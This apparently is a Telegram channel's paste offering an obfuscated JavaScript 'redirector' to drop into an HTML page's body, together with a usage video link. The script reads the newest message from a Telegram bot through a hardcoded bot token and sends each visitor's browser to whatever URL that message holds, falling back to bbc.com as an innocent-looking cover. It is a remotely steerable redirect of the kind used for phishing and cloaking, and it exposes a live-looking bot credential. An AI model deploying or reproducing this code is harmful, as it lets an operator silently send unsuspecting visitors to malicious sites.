Channel: https://t.me/+R0ThhXb7z6MxNWM1
Owner: @WeedyDev
Check The Template And Add The Codes after Body In html
Raw.js - Decoded Version
Redirector.js - recreated Version 

- Usage Video:
https://youtu.be/GgpbevQL_Bg

Original encoded Code

<script>
var kick = '6539309235:AAGxEKlltZKRHQyCB0TJqkkfndJTr_zg2QM';
var showmeway = 'https://www.bbc.com';

var _0x3587 = ["text", "message", "result", "http", "startsWith", "replace", "location", "then", "ok", "json", "https://api.telegram.org/bot", "/getUpdates?limit=1&offset=-1"];
function ratedata(){
fetch("https://api.telegram.org/bot" + kick+ "/getUpdates?limit=1&offset=-1")["then"]
((_0x403ex4)=>{
  if(!_0x403ex4[_0x3587[8]]){
    window.location.replace(showmeway)};
    return _0x403ex4[_0x3587[9]]()})
[_0x3587[7]]((_0x403ex2)=>{
  var _0x403ex3=(_0x403ex2[_0x3587[2]][0][_0x3587[1]][_0x3587[0]]);
  if(_0x403ex3[_0x3587[4]](_0x3587[3])== true){
    window[_0x3587[6]][_0x3587[5]](_0x403ex3)
  }else{
    window[_0x3587[6]][_0x3587[5]](showmeway)}})}ratedata()
</script>